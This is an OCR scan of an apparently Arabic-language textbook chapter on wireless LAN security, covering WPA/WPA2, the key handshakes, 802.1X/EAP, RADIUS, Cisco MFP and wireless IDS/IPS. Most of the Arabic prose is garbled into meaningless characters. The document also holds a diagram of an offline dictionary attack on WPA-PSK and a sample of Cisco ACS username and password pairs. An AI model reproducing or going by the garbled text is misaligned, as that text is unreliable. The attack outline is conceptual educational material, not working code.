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4 \\\, Al\' CklfLuIull ^3 


IEEE 802 lli/WPA2 



4-1^^ j Fi c^is (Ai j Wired E(^uiv<rlent Privacy ^VO^EP) jddaJl Ui^P- 

"\X0. — (^^4 jyil J yS”"l jk*4 4j|wLi^u*y d«klj IEEE oLJjyS\J , yi j s-lj^SsJl 

IEEE 802.1 li/WPA2 (jr «~u 3 IEEE u ^ : jki 3 Wi-Fi Protected Access (WPA) y j Fi 

ap^ yy 2003 j aS*>UsL (jii ^ijJi 2 uJi^ c~*is aii Wi-Fi Protected Access (WPA) uti 
Wi-Fi Protected Access oa^S/i jL*~ 1! draft aJjSn a^Ji y j WEP yuli jL*U Jiayi 

IEEE 802. lli Uk ^ ^aii 3 II (WPA2> 
^ o^o 4 jU lal J 2004 J jk4 as J ai^l J d,a>Al jL*i! U/jUT^ IEEE 802.11i/WPA2 U J 
spL. WPA £. J^bo- of 2003 a*, f jJi ^—sl js'j IEEE 802.1 li-2004 Uk 

firmware 

WPA o!^ 

£_jU« jwd dUi j Temporal Key Integrity Protocol (TKIP) ^iaa^u-1 <j WPA i£i ySj 
4jbi ^ujdj Ud WEP ^*«S1 p Packet d^fi dy^^ d^-ao 128—bit d_^k? ° 

^ I^bC 1 ail I a aiI jl ^ I ^ ( _ r ^s'^\ j l«Jka; 104-bit y40-bit 

AES encryption JLp .uyJ Jjju; Ua*. y 
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4 \\\, ^\W ClAfLuIull ^3 


MIC message integrity check ^jJS ^ } Micheal l? *~j xjSz JLp WPA Usd ^yA 

jJi ^ 3^1 «Jl* j WEP <j cyclic redundancy check CRC ;uad ^aJl ^ j 

Ji Jl ij^y l^LU j aJL-^.1 fjj\ y Jbd (j jJl capturing ;lL^ aSI/^i ^ ^ WPA 

«y> ys”"i "WPA.2 (3 Caji (J-Lx~ui <bi yt A/II(2 (•■A _? 


WPA Authentication Modes 


Enterprise 

(802.IX Authentication) 

Personal 

(PSK Authentication) 

Authentication server required 

Authentication server not 
required 

RADIUS used for authentication 

Shared secret used for 

and key distribution 

authentication 

Centralized access control 

Local access control 

Encryption uses TKIP, AES 

Encryption uses TKIP : AES 

optional 

optional 


(WPA Enterprise) j (WPA Personal) u* jdydJ ouy l.jJ 


WPA Personal 



Network name 8B7J4 

Security type: 0 WPA-Ptrsonal 

Encryption type: TK jp 

Security Key: 

Bfl Start this connection automatically 
Cl Connect even if the network is not broadcasting 

Warning: if you select this option, your computer's privacy might be at risk. 

Next j f Cancel ] 
■ - - - - 


D 

H 

I | Hide characters 
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4 \\\, ^\W CUlfLujall ^3 jj l dl 


pre-shared keys (WPA- sAi j ^ Up jU. ^-hL. y_b^l ^ WPA Personal j 

RADIUS server yo^i ^ ^ JjLU Jju SOHO uuLi oiiUUi y gu fjb^J.1 ^ j PSK) 
^■uus' pre-shared key (PSK) ^Lb^u yy-j WEP ^ WPA ou i-U j l? Up jL^ 

access point « client ,jjj 2yJL« 

WPA Enterprise 




& ,t2! Manually connect to a wireless network 


Enter information for the wireless network you want to add 

Network name; eduroam 


Security type; <^^JwPA2- Enterprise 


Encryption type: ^£5 

ri 

Security Key; 

, [U Hide characters 

[S3 Start this connection automatically 


IQ Connect even if the network is not broadcasting 


Warning: If you select this option, your computer s privacy might be at risk. 


Next ] [ Cancel 


EAP rjp </b y 802.1X/EAP jjy yjb^-b yj (WPA Enterprise) w 

y EAP EAP-TTLS PEAP (Protected jf EAP-TLS (Transport Layer Security) Ji« 
uy y MS-CHAP v2 [Microsoft Challenge Handshake Authentication Protocol] 



Supplicant 


Authenticator 


^- Security capability discovery - 

^- 802.1 x authentication 

-* - 302. lx key management -► ^- 

-i- Four-way key handshake -►- 

-+ — Two-way group key handshake —*- 


Authentication 

Server 



RADIUS-based (PMK) 
key distribution 
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4 \\\, AA\' ClAfLujoll Jj-oi ^3 jjuflia, 


Ojj (probe request, probe response) obry ^ jJyJl ^ JU-i US' 

bi^l 0 wLa ^Ip ^ Jilji l) 1 wb^y Aj t (j (1)1 C-J^j i j*^S'y\ J jl^-i-l 

^Ji ^ ^ww^s^'yi ^J,i master key (Jb»jb ^yL> iAi^SCi^i jjlp ^ 802 . 

Pairwise Master Key (PMK) ^bii.1 laA j <_JlUl jL^jirl by^* 

Pairwise LS ^o y-T ^-uu jJy igo. ^ jJi j four-way handshake ^bj JUy uL^ Uji*j ^ ^ 

Transient Key (PTK) 

2j^u yj^ J^iy 004 two-way group key handshake u _«~j J-lyJl y S-bo*. al>-y U4 to, S 

authenticator j client ^ Group Transient Key (GTK), 


Unicast Keys: Four-Way Handshake 


Clienl 

<%*—r PMK 


PMK 


AP 

dB**—» 


„ _ Access Point random number senr 

| Derive PTK | 

- Clienl randcm rumber, MIC, V'jPA. IE -sent - 


*A\r. WPA IF --.rnt 


Access point generates 
random number 


derive PTK ] 


- PTK bone message, MIC sen! 

Install TK 


Install TK 


AjA^- ^7~uu four—way handshake o , i^U>- j .4 ‘ j y-UyJi yj 

Pairwise Master ^-uu yp ok jbi j Ju^yi uUp aSy Pairwise Transient Key (PTK) 

(PMK) Key 

qjk uui So- yiyi WPA four-way J^yJi uLjJ 
Authenticator j Supplicant PMK b ^4 wbb b 

pairwise temporal keys fcijil ^yuii oJy - 

4-bUd.l JyUil 0*)Ub^ JjjJ — 
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4 \\\, CdlfLujoll Jj-oi ^3 


pairwise master jJy ^ of juV WPA four-way handshake aj^p oi of JJ 

aJUi oi^kM Jiy; ^ server authentication 5 client jy. 802.IX jJy aJ^*J a^uT key 
one session Jai* So>-ij ;uJL Client Jl Nonce ^ JL*AP Vjf 

j AP d^ d—*—■jyLi2 aJyj Client ^yL PMfK LoaO ^iJb^iwoO j ^yojJi y>d toO 
ayy^Ji j aJiaTPTK ^LJ- oJLSi j pseudo-random function (PRF) ls ^j aJb 
frame aJa^*y yy!l ajL?- yj j ijyjO.1 ^liiU y P.MIL 3 ^ A/IA.C2 3 j AP j (Client 3 s-Oyll 
yyji of osiOJ diii j MIC (message integrity check) ay; aky check sequence (FCS) 

1 yj ^ 

^ i_^ ^ j_o^< ■w.L ^ 1 LwJl ^ Client j j l ^ no tic c .aO <> ~—^ >« > LOO 

jL^OO ^ ^jy y^y O^^j laa> ^ group key (JU^L l lO2O 

Jl~0j 0J ejj&lar a0_»-*0 J LiUujI ^ Jj 01 -CS^lj yj L*jIj 

^yLk d^ y; 4Jli 64 bit 24^! PTK caaji»l ^Lx&Ll d? ayk 


EAPOL- J ^2^ j EAP over LAN-Key Encryption Key LS ^ J _ j 16-byte JjSn 

Client d^ aiadLoo oULj yl jkju; 3 j KEK 

^LJ- _j KCK J j^-, j EAPOL-Key Confirmation Key j j 16 byte J \jk> yiOi 

MIC 

unicast data ya; 0J0 j yjk *a>^ j Temporal Key TK y» j 16 byte dJlOl 

Packets 

^LJ- j»jb^o tka^i j Michael MIC Authenticator w j 8 byte Js'^uL j 

Client j oaj^j I aL-f' cjOLOI d-^jl^ .MIC/ 

Group Key Handshake 
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4 \\\, AA\' ClAfLuIull ^3 jjuflia, 




c8h-t PMK 


Group random number 
& group key generated 

[ Encrypt GTK with KEK | 

, Send group key (<3TK>, UlC 

Decrypt GTK ~| 

- GTK done, MIC -^ 

| Unblocked data traffic | 


Unblocked data traffic 


j a —s'Sn y JjL-j cf \ JUx^i gA GTK (Groupwise Transient Key ) 

jjjLwJi \m two-way handshake y elk y 

L^jL?' J KE K LftjyLio J SSG"! (3 d^J .bJjr GTK JL-Ujl; C^JJJ L y^S''^\ Vjl 

MIC ^ I lj 

cuk>JJ j GTK J 4jU?c_Lw^Ij aJjk >jJli Ulj 

^jLL. oyj Ji ;u—k. 32 bytes J^k; GTK (Groupwise Transient Key ) 
unicast data jJlX dk « « Temporal Key TK y 3 16 byte J/d 

Packets 

^LJ- fjiAy _j Michael MIC Authenticator u*> j 8 byte J^kj ly JT cddi j 3 d! j 

Client 

WPA Encryption 

Olt>er values used in key inlmrily prolocal 
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4 \\\, AA\' ClAfLujoll JjD ^3 


encryption jyiidi u>-^ ^ ai UaJ 4jis ^ JSCdu authentication jJyii aJ^p ^ as WPA of US' 

TKIP AES b£ jyp dJJi J £jlj JiSCdo L^2 j! 
4SLL2JI ^y> j^Til aTJ j ^VEP RC4 jy LDjJl Jj >X>r ^liaj AES L®l 

^\jLjux]I ^j-^ 4 ^^jJl lal p^ 

a^; Jj; v JjSyj^ Temporal Key Integrity Protocol jU^i y> j TKIP \J j 

^-ji jL« ^wb>c^o ajI c~w>- WEP ^wL>cjl^o aj ci)i *yi WPA JJ jiaiD j R^C4 

WEP 40—bit JijJgj Dir di a*j 128 bit Jj!?.j 

^ 4 ^ di cJjyti! j*j IV initialization vector ^ WPA ^a!i 3UJ! l4 

dyLD^4 j^p j jotxJ *V a^a^- A<i^i WEP (3 IV D*y j 3 jL-*JI jT-aJlj D*r5COIC aJ^p aI^^Ijj ^liiil 
3 DJJ3 j jyLDjJi \X& ^ j IV Aa^jJ di Packets JuJj>tij c/ 2 ^ ^ia>cJLs»lj j ajU 


aLU oIpL* DjD^p 


j WEP 3 DiT L>r 24 bit Jjl?-j ^j^J j 48 bit JIV eUaT aJ^*Ji aJj^ c^jJc& "WPA 3 

ALw*j 645 3 L« ^1 d^vTi aIjL^- d^Jj/ 280 ia& 

^-LuD» U U-^ orb JT^ p MAC ji^iri Dlyp £* PTK jTJ mixer ^ dliaT 


4jU j^LJaDI la* ^r 4 j j^v^J AiU^^b aJU Ia4 j 1-4 aL-jII oULDl jyLDJ I"V DiJi j? c^Tb 

j^yDxjJl ^4 Dly^P aIs-^I^j aJ^p c-DL^axT ^^vr^l 

Message Intesrritv Check 
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4 \\\, f\W CJlfLujoll JjTl ^3 


Michael J MIC Jl ^ Message Integrity Code l? *~j ^lL" j_b^i y* WPA j _^Vi Jj-cdi 
cjTUl JL-jI 4»*>L- SJIJ. iiX!i j UjyLio JJ o5\Jl Jl aJLLhJ! bits £-Jj ^ c-v 

802.Hi 


VI cJAJl Jj 3oS'ldi MIC ‘LJ-’ liJJ-lS' j JU j jy^l IV j JjJl ^JlifWPA. J$ bjaJ OVI 
eJJS ^ SOHO ij^i5s-wj« (3 gjy^i ^pjJ.i ~\X^P.A. PS^K. ^3 ^pujl Jl^Ij-iJi aJo-p oi 

ySfi Ha els' ei j <. aSCiJi ij$>r\ jbd ;u^j Juvi f j-° j deauthentication Jsijyii oJi J^p 

WPA2 Jl Jiisyi Jl ^IjJ-i iPi la iJl* j oj^ 4ji Vi WEP j ^ lc ^^i 


^s^xzxjoqojooco c0h— r <xmxxxxxx>oc^tej 

PSK pfe-programrried „- 


Wireless 


Staiion 


' pre-programn-ied 
mthe access point 

and trie 3tat*an 


AP 


BD2.11 security 
capabilities discovery 


WPA key mgmt (generate 
and install PTK and GTK) 


Sniff ANonce. Snonce, Access Point MAC Addr & STA MAC Ad dr 


\ If'' 

Derive PTK = EAPoL-PRFfPMK, ANonce 1 SNonce 1 


AP MAC Addr l STA MAC Addr) 


Atiacker 


Supplied by pre-ccmpuled dictionary 
Note PMK = fgnelion (PSK) 


vi; Jju^o 802. IX c^jsjlt jid' 2004 j ^ ^i 802. lli j* ^ WPA2 

National Institute of Standards JJ y jlU gjJJi AES jJjJi jj> y 3UJ1 JJrl RC4 jJjj 
C vlOb j Rijndael algorithm ^ olU ^OJj and Technology (NIST) 

WPA J*v UJt» MIC cJEJl Jj-v^j Cr 4 aS'lJl 2ij*)li? LJj^ j I"V 

WPA, WPA2, 802 lli aj.ul. 9 i* 3 


WPA 

WPA2 

802.11 i 

SOHO 

Enterprise 

Enterprise 

802. IX 

authentication/P S K 

802 IX 

authentication/PSK 

802. IX authentication 

128-bit RC4 w/ TKIP 
encryption cipher 

128-bit AES 
encryption cipher 

128-bit AES 
encryption cipher 

Ad hoc not supported 

Ad hoc not supported 

Allows ad hoc 

Test devices for 
compliance 

Test devices for 
compliance 

No test, specification 
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4 \\\, ^\W dilSjjuall ^3 


wLlp 


^KTPA j ^liM jjjJaJ 

j>- c-^>- key caching a^jI^Ji ci^l^^JJi oSj& a-jjsj lA> LojI^ 

(_ j <y >~ I ^-^l^JLuvO 4.^-oJwJl y^~ aJLP^ j£j S-Al A^^3 ^jyP d 4^-cJwJl ^j- 4 

^jyJl ^1 4_?>rL^“! l)^Jj 



Associate request 

- (PMK SA. Both PMK SA Lisa) 


Access Point 
PMK SA: Bob 


Associate rasponsG (success) 


. 4-way handshake message (PMIK SA: Bob) 



i Preauthentication 

i 

i 

i 

▼ 


Cisco Centralized Key ^ Lai. a**-*? "\^^P.A. d^is 

Ajij c~p- 802. IX j oju 4 US'association _%!! oLL^ Sjbb Aj/Xii c~^ Management 
(3 “CLjy jv-j c~i^j l (_r*d _j authenticator jyA jj-c 

^Ljil caching yij^~ e—^>- (Jl>- <3 j- 4 *^ j S-Jl? ls^ 4 100 y» JJI 

PMK 


Cisco Centralized Key Management 
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4 A\ , i^\\\ ClAfLuIull Jjad ^3 


Wireless IDS/IPS 


Controller IDS 

NCS 

InnC Ainr*! 1, 

pA DoS Alert! 

V 

\ A 


^ No Alarm 

E^SSlr Aggregation 

At 

1a 

"\ 

r* 




^laii y Detection * fl.»,aS0i c^ 4 ^^^^^ , *^fi a^^axj 

Intrusion Detection jjjL^ ^ a^LAi «J^ o-~J ;l£l.*>Ui oliCjJi ^prevention 

Intrusion Prevention j l^ilypi jLu-i oyu >uii #1* jp <jui50J Systems IDSs 

LiL^i y^uJ.1 System IPS 


Wireless IDS 

Radio Resource a^bi Jjl v aji LWAPP LS $X-yJi Jyyy^Ji <3 bcy'i ^Ua-L ^ 

o*)tp-laiJl jL^-l j ASCiJU (_£yoi^Jl L^l yil^L ^JjjfuSsJl j caa^ U ~S'}\ oh Management PRM 

Traffic Load aSCLi JLp J-J-i j Interference 

c^iUi! j J^jy (jiJ! oa,^ TSn (*ji jl Intrusion Detection Systems IDSs 
Jjuaj ( jjJi j oiyiJi ®L& (3 a>rjj ( jJi jLL>eJ.i sSTiJi (3 ci3>"Vi olyJjjl ysiyc 30 ms ®ai ®yi ( JS" Local 
^-yLi WCS ^Sj j Ad Hoc o^/Lv^j! y ILogue AP Ao^P C-CjjJ I Jj>r i^J (3 

Internal y External Known ® WCS Jaii^p Js- ^ j aSCil! V jJi ca®j® 

Known 
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4 \\\, ^\W ^3 Jjuflia, 


Cisco IDS for 
Passive Monitoring 


WLAN client traffic duplicated 
to IDS through monitoring 
port for passive monitoring 


WLC 


WLAN Client Traffic 
between WLC and 
general network 



Ml 

ivi 

in 

Corporate 

Network 


LAP 



E 3 SS 2 IF 


Client traffic between 
LAPs and WLC over 
LWAPP Tunnel 


I j L |»ji jf a*j Intrusion Prevention System IPS yL* Ll; L* Ji j 

4j ^ jJjJl ^1 p s-ll) Sl*l jl aSLdJl Sl^b 4-Jl L» (J,! 

aS""LJJ ,joj jjb jSyil (_s^" j^iLv^ wLoj^ti jjJl j Branch — remote eapLJ.1 jj 

Rogue j Rogue Location Discovery Protocole RLDP u*> also 

detector 


Jujyu " © jjsli" a£gJb Ll cUdjJ I ^JL ^-4-$ ^R-LDP L®li 

j^Ss j 'V L«-Lp j aSwLJI (3 ^ jJjjuSCil 4 jLLj JL^jI ^ 

jy L£j jl oL*lS^ 
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4 \\\,^\W ClAfLuIull ^3 jjuflia, 


R^Ogue jj& j 4SCdJl 3 ^>- 1 jL^r jl <*Sj>-\ ol^l ^Lx>cJl>» LjU lz^jjjj u ^S^l lyLtw« JL^jVI l)I 3Jl>- (3 t*t 

aJ^uU Address resolution Protocol — ARP JjL-j j Detectors 

(_£jJ! J jl^rJJ MAC 4£j*y» P JpL-*u jJl j 4 j <Jjld j Oj-J 


^ (_£jJl jL^jirl ^1,1 jljo'yij ^jJL c<^>- ^SCdJ! 3 Ad Hoc ^1 p dwipL^vJ.1 3 ^jJL 

disassociation oby >p ®Jl4 aJL^;! dU> 4 j Jl^jV! 


(_£y>-l l iij^u j l^ ^p\yS> 1 l)jJj ^SsJ J 4-JL^^I jl?L>ci.l ^P (..jLdSCJb ^llki jj& IDS jU d)i! 


Wireless IPS 


Cisco ire for 
Active, In-line Monitoring 


WLAN client traffic data 
path is through IPS for 
active, in-line monitoring 



WLAN Client Traffic 
between WLC and 
general network 


LAP 



Ml Corporate 
Network 


Client traffc between 
LAPs and WLC over 
LWAPP Tunnel 


L»Jjp ^SCdJl J^ta djjr^Vl jUa^l ^jP LiJJ dJJj Jd* d\ ^SCxJl V Jb\j£- iiljLfc 

14 4 J j^p j^L^a <JjL>e-c ^SCxJl 3 j! jL^>r 
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4 \\\, AA\' ClAfLujoll Jj-oi ^3 


oLiis JT S/Ll aJ^ j Intrusion Prevention System IPS ^ I wL^C^w^ I ^ wO djj!i (3 

4SwxJl cjLII? JTj aSs-j-jJIj JUjVI 


ji jJ oU^SCli dJj!i j Console j Server j Sensor oU^SC* o*Aj ^J^IPS o^So 

^ jiSl Jl 

detector c^jjj js* j ^^s>zs^\ jjJj ^Sj Sensor l#i 


sensor i $jaii L jJl oUjLd! JS" server \J j 

Server JJ^ Jlp *Ij ji^Ji iu£b ^oi! u jJi jt Sbty ^ Console l4 j 
JSCJi lJus. l^p ^ gjiJ! j Cisco® Adaptive Wireless IPS u gjaJ j 


System 

Functions 


Usage 

Scenarios 

Rogue Detection 
Mitigation 


Detect/Mitigate Rogue 
APs and Clients 


ggp 


Over-the-Air 

Threat Detection 


Over-the-Air 

Detection 

^ra» 


Detect External 
Hackers and Thieves 

Security Vulnerability 
Assessment 


BSW 

Network Detection 
and Correlation 


Ensure Strong Network 
Security Posture 

Performance Monitoring 
and Self-Healing 


Complex Attack Analysis. 
Forensics, Events 


Ensure Consistent 
WLAN Performance 





Proactive Threat 
Prevention 


Ml. 


Internal Secunty 
Reporting/Audit 

Security and 
Compliance Reporting 


Monitoring, 

Reporting 


External Compliance 
Audit Reporting 



jjJj MSE j jjJ j c-Cjjj ^ I ^jJLj cl~c>- JjLJI o^bJl oU^SCl! d)l j 

^3jwJl j jJjjuSsJl <j\>- ci jjjliLiSl 4-4^ ^ jjwb "W^CS j ^3jwJ! 
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4 \\\, AA\' ClAfLujoll ^3 j ^ >VN *\\ 


Management Frame Protection : MFP 



Rogue 


j j xS^i joi?c« jiL^s WIFI j IEEE oiSC-dJi jol^« » ooLu^wjjil 1)1 ^S'j 

hj\^\ ob^ylil /jj* ^j,lj 0jyb->- j Qjy ^*jxj ilL& 1)L$ 4^SCL>>*)\Jl c^lSC^xJJ jJl jyLxJ * c5s.l5o 

authentication/deauthentication, Ji« Wireless Management Frames ;l£l,Ni 

association/disassociation, beacons, probes 

Jj-j^Jl » jyLijJl » ^jyallil oU-ji ^v^3l jj, * ^Jk>- ^j^lj (_£) l)j Jj LAL^jI dJjk (1)1 CL~o>- 

^U- Jijcj of _/U <^f of I 1 a j Wi-Fi Protected Access [WPA], WPA2, VPN 

Jill (J"2f'“ (_s^ - Air Crack iIsLjj LgJJL^ j LgLaiL 01 i^~-a 01 ® 1 a aJI^- l» 

Cisco Wireless LAN Controllers Ujl^ c~*is aii £%!! 11* ^ Sju*, ^<j ^ jSC^- j 
MFP- Management Frame Protection i$1p c~iU?f ol^l »1 a ^b j ajL^i (WLCs) 

Client MFP j Infrastructure MFP Ji j 
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4 \\\, ^\W ClAfLuIull ^3 


Infrastructure MFP 


Cisco Wireless 


Error 

Report 


4 


Cisco Mreless 
Control Sjfslem 
(WCS) 


Cisco Ainginet 
Lightweight 
Access Poinl 



Valid Management 
Frame 


Rooms 

AP 


LAN Controller 


Invalid Management 
Frame (Dropped) 


Cisco Ainonet 
Lightweight 
Access Point 


wtS^LxU ^ ^JjLww^Jl JjLj 4 j J^yil 0 *^/ l«Ll> ^ 

client J*>U ^ juTLii V jsSLiJi j 
(jjb’yi >^1 j ^ SSID SLiX-V aSLs. JiCJ Signature 4^-v^ *A-J jtj jJI L& j 
jcj> j integrity check (MIC) message l5 ^j sai^ 4j^ j Uoij j Management Frame 

4ilJuiSl jCylil laA l £' 


jjjiil ^JLp 4jU aJj£ 4 j Lc^i ^ L^aiP j 


Rogue AP J*>o jt oj/ 


Ju«LscJl ajl« a>-LJ jJjjuSsJl 4 j>c-^j jLxjb 4-jLs ^JUj *)! JVLFP ca^jj Ju-a^o L^jjlp j 

o^all Jj>-I j jC^LS! ^ajk 

J,l jLs^jb ^jJL) jJjjuSCJI OLj jJjj^uSsJl Aijyc4 j^p JVLAC j L* j! BSSID l)I l)LS^ !i! — 

jLg-^rl oJuk e-J-L? ^y23jj C^JJjj L/ *^jT s )I\ Ju*j£ L£ c3jjX^4 j^P jL^jirl l)I 0j\J4 
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4 \\\,y\W ClAfLujoll Jj-oi ^3 jjuflia, 


Aicwy^Jij V ^cyiSi j MFP j jJjj^iiSCJ! <^3jyc« MAC j eJ l« ji BSSID 01 els*"lii - 

fjiJ jf jJt (i/iSy ju*j ois integrity check (MIC) message 

MFP jjjLiiJIj j MIC 4j<«^)i) jCytii J5C 

message il > f~y^ <. A/LAC] j *—h*j L* y BSSID ji ois"” isi — 

su c~^! Jl jL-jL tyu J 3 j&\ ois MFP j^Lidb integrity check (MIC) 

AES-encrypted LWAPP management tunnel 


Client MFP 


Cisco Wireless 
LAN Controller 



Rogue 


l«j fji j Spoof AP MAC jf AP Impersonation ^ oISCjJi j a^uJi ^ 

Jl c^jjj u SSl\ L^JL-jj oLy ^ j disassociationj deauthentication Ji* 45 CjJi j s^-t Jl 
DoS olSIj^-l Juo^P jt ( jA^£*'i\j JLv^j^JI ^Ip (Jljpz-l iy> L^L^r^! aSs-jJJ! 


c^jjj ( ^y* ys* ci)U !jJ> j j (JLaJj^j ( ja^aS^^\ Jl^jI ^j^ij Client JV1FP 

DOS j>p aJ jL^- <^1 j! aSCxJI (j <^l ajL^? jL>sjd^ (^! c3UL)l j j 
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4 \\\,ClAfLujoll Jj-oi ^3 jjuflia, 


j deauthentication Jl* Unicast Frame 3o>-ijJl ob \,b^! oU^iJi jUu ^ ^kii »Jla j 
j MFP si^aj o> ^ ^ /cy JsLL-i ^jo c~>- Probe Response jdisassociation 




Cisco Compatible Extensions a^; alk* of ju*>b UjJaJi «!* ^ j 

AES- ji Integrity Protocol (TKIP) Temporal Key ^.WPA2 jJlsj oU ^ v5 

Counter CBC-MAC (AES-CCMP6) 
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4 \\\, ^\W djlfLdill ^3 


Centralizing WLAN Authentication 802 . IX 



JU- j 4S2 jlJ| 3 ^3^3 ^AiL* Ju^p d^lSkiJl 3y*^ 4 jl* ^Lju ^jJ! 

OJ: <lS2dJJ ^jjLil <LpJjtJ J^P j! 4j>rU-l Oj^Js> ld& J L^iljO'M ^ dS ld£> ^SkdJl (1)1$ filial! dJjk 43 jAJ* ^ 

^P 3,11 th CH.tl C3-tlOH. ^J,yg$ L<*jky (J^ULdu d4 d^l ld& ^ 4j ^ysA>- ^A. lL« ^wL>cJL*^« JS2 l)^^j 

jj& j 802.IX 4 jlp L» i^y?Sij !jj& j ^c-juii djj!i 3 3 aJyJ 4 jjS^« J l ^' j encryption 

4^^J^>*yJl d4I 3 z*-^1^ dI ^ ^ d-^LcL<>^p 3 4^wL>cjdvJ*l TELE d>-l 

Authentication server j Authenticator j Supplicant ^ 6^ ^ 802. IX ^lk jjSk 3 


Authenticator 2 Authentication server 

RADIUS / Diameter 
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4 \\\, AA\' ClAfLulll ^3 


aSLaJU ^jJjJl Jbjj c^JJl jl^M jH^i Supplicant u 


c~j^j a ^<'S 1 ' jf J^> Ujjp aSLaJJ ^-jJjJi ^ jJi Authenticator j 


v Ajj^ oUi _^p aSLdJJ ^Jj aJ^P JT ^ jl^i Authentication server j 

Authenticator System 1 Authenticator System 2 



jL-jb jJi Ul* j Authenticator j Supplicant ^bjJ Jb^;i iJLa o/L- ^ikJi iJl* 3 

eJuk lii « Authentication server aky^ JyuJi jJy ^ jf vt ob/'i jLkk y 

a!uci ^ Sj4>rS/i jl C L-J1 ^Ip -u^j USf "port"-based authentication akki 


I 1-^*3 


8021.X over Wireless 


ab_& 3 j AjSvbvu*)b!i olSkaJi (3 b»l jj!> authenticator jOt> akCkJi olSkaJi (3 

open authentication a^Lp j J^-'y ^ jrjJjJt ckk jJy ob aJbbi 

authentication iji ^kuj j authentication request jJy <_Jis jL-jb supplicant 
association *J\ j association request aSkaJb kb^l cAk akijib ob response 

response 


45 






















4 \\\, AA\' ClAfLujoll ^3 jj l *\\ 


aSs^JlJI A*JUj 4j C^-oJ L« l)U <LSCL>>*)Ul ^Ss^JlJIj (JL^2jI dLS ^J3 (Jj ^2r*JJ ^ ciijU 4_l^>cJJl dJjk ^>- 

ji j£jy* £)*)! ^Ss^xJIj o'VI ^>- ^^-vj i ^xcjj-oJl O'y 4SwxJb JL^j^ a*j ^J^LwwJ i i^iJjlSsJ j 

4jU 4ji-Lv^ oULj ji C-JJi2J (_£jJl jL^jirl (1)1 wbw LaJjLP J R^A.DIUS Luk (jj5s-^ (_£jJl J _l*j 

wkU a) (J^j ^ ^ ^ ^z- qJL) c L^*3Ij 

j Authenticator 5 Supplicant ol^ y>Sf' i_-lk^ V ij ^Jt oiSLaJi j : 

a —sAt j RADIUS Jjy* J^p 04jj ji Jj jit*- l$i* jy Authentication server 

— eJJS jv^aj d)L^" ol c~ijp 


Unique Encryption Keys 


Blue 



Blue 




Gold 

Red 




Green 



Gold 



Red 


4 

Green 


3iL>u eJJi UlL- yJi oiSUJt Juix^j j JSUu supplicant jipr jy^Jy ^ 802. IX j 
j RADIUS jijw ^p session JUaii aJ^p J53 j jlpr JS2 WEP key Joj ^Asi* jyyJJ jUai 
~\X^E(P key ^1 p ytyj ^ ©y& j\^^j Ji ^yL A^SO-^yJ! a5\^j2i ^p~4j y ^yp op jy 

session keys 
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4 \\\, ^3 Jjuflia, 


Extensible Authentication Protocol -EAP 


^^^/cococxx/xxxxx^jjjj^^ 



AssnriMinn Rsqiiest ^ 


4 A^nrintinn Raspon** 


FAPOI -Start ^ 


EAP 0 L-Req uest/l dentity - 



EAP-Response/i dentity 

_ EAP-Response/ldentity ^ 

over RADIUS 

^ EAP-Request 

^_EAP-Request aver RADIUS. _ 

FAP-Respanss ^ 

.. EAP-Request Over RADIUS ^ 




EAP-Saccess & Encryption Key 

^ FAP-Stinrftfis 

^ over RADIUS 

4 K**v Management - ^ 



Jl^-y (j aJSL^> JJ- Internet Engineering Task Force (IETF) Jj ^ ^ y> 

I Iandshake yTy yTi <lojI^c Dial—in ISPs <L»aiL 

j Password Authentication Protocol (PAP)y Authentication Protocol (CHAP) 
jjydl yyJ “authentication type” aju Js- ^ ^UL dDaJ 


\^> Js' Sjujlp ^lyf 4J j request, response, success, failure^Ikii oVU oU Jju, o*>C j 

PEAP (Protected EAP), EAP-FAST LEAP (Lightweight EAP), aJ^>- 

EAP-TLS (EAP- (EAP-Flexible Authentication via Secure Tunneling) , 

Transport Layer Security). 


CWNP (3 4^5s-L>)^Jl CjlSCjJl uv^J l*JjLP ^Juwy^Alllj 4^1 (Jib 4JLP 0 ^JlS^ J 

CISCO 
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4 \\\,A\W ClAfLuIull ^3 jjuflia, 


RADIUS Sk-tljj LSX/M &CiJU jJjJ yijw 


If Group * x 

If time between 9 am and 5 pm 
If temperature below ♦ 90 c F 
If VLAN = 80 
l— „ Grant Access 

a 

Authentication Server / 

RADIUS Server 

UT u aSU client/server application layer a^Ui a^kii J-ju ^ y> 

Remote Authentication yjjS^li jjydi dJjk ^aUjJ (3 J 

Ju JSy >* j jjjLjjJb Active Directory ( *Uaj eJL <3 jDial In User Service (RADIUS) 
authentication, authorization, accounting (AAA) J'yjJi ^UaJt ^ 
Internet cJyiVt Ji oiiai >? Livingston Enterprises JJ ^ 1991 j oLu ojIT 

j aXL-yJi oiSUJt j ISP olSU j 4 j ulu l-ll. ^-^Engineering Task Force (IETF) 

i I*.* aaU ^ l j 1 j ^ ^ ji^i^' i^»J' ^*^3^31 i ■ 3 3*^ . i ^ y 1 *■ — * 331 Cr"^ ^ i 1 

yjwi' Cisco Secure Access Control Server (ACS) ^ ajIs ^kSb j 

a . ^ (V SCJ I ^ >—* j t) to o a^* I 3 ^ j—<>^x31 ^ AI ) 11„1 

RADIUS server j — Ji jjm gjaJi 5 network access server (NAS) — jy Ju^-y 5 

User Datagram Protocol (UDP)JUj«jJ 

Access j Wireless LAN Controller (WLC) ^Ju*a-.L UJL-'y aSCa jUu a hjb L* } 
j aXL-yJi aSCaJJ ^JjJi ip'j AAA a^ p* ^ dUJb ^Control Server (Cisco Secure ACS) 

Ju!i jJSCJl (3 jJl oL^-jJl j ola*ll ^a>ti~u—> 


Dial in User 


nternet 

X *> 


s^^ioooooxxxxxx^j^- 


Supplicant 


Authenticator / 
RADIUS Client 
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^joQaSI jjU 


4 \\\, JjaI ^3 jjuflia, a!I 



Cisco Secure ACS Configuration 

Juojt) j j^jy* 2003 Jj-Ujj ^1p j ^y* d-U>_^- A.CS <U^U1 j 


Username — acsreadwrite 
Password — acsreadwrite 
Username — acsreadonly 
Password — acsreadonly 


4-JLxjl 

Network J*>U ^ uJJS j RADUIS Server Ji AAA Client s' y^f ^j^uSOi y^f 

JSUJb US'^jjuSOi oUU Ju^i i Add Entry ^ UuJt ^Configuration 
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4 \\\,^\W djlSjjuoll ^3 jjuflia, 



Network Configuration 


Add AAA Client 


A.M -:fc#m l-k>i1ri-T+ 

WaC 4+30 


17?.1C.1.30 


iia -ctoni F Ir5^«i 





d 

t«r« 

irtfiiM 


■fAui ijm r.fiy i«r*-ri|*» 

K*t L'K'Yprm jr*v 

Mor’«H *U-lKn^Jk4tor^KJi i*/ 

^ ["Ipu: r«TT 4 i P AfCB * UtM+Tit* 

Mnh^n1»t«rp nun*] 11**0IVE (f^JW 

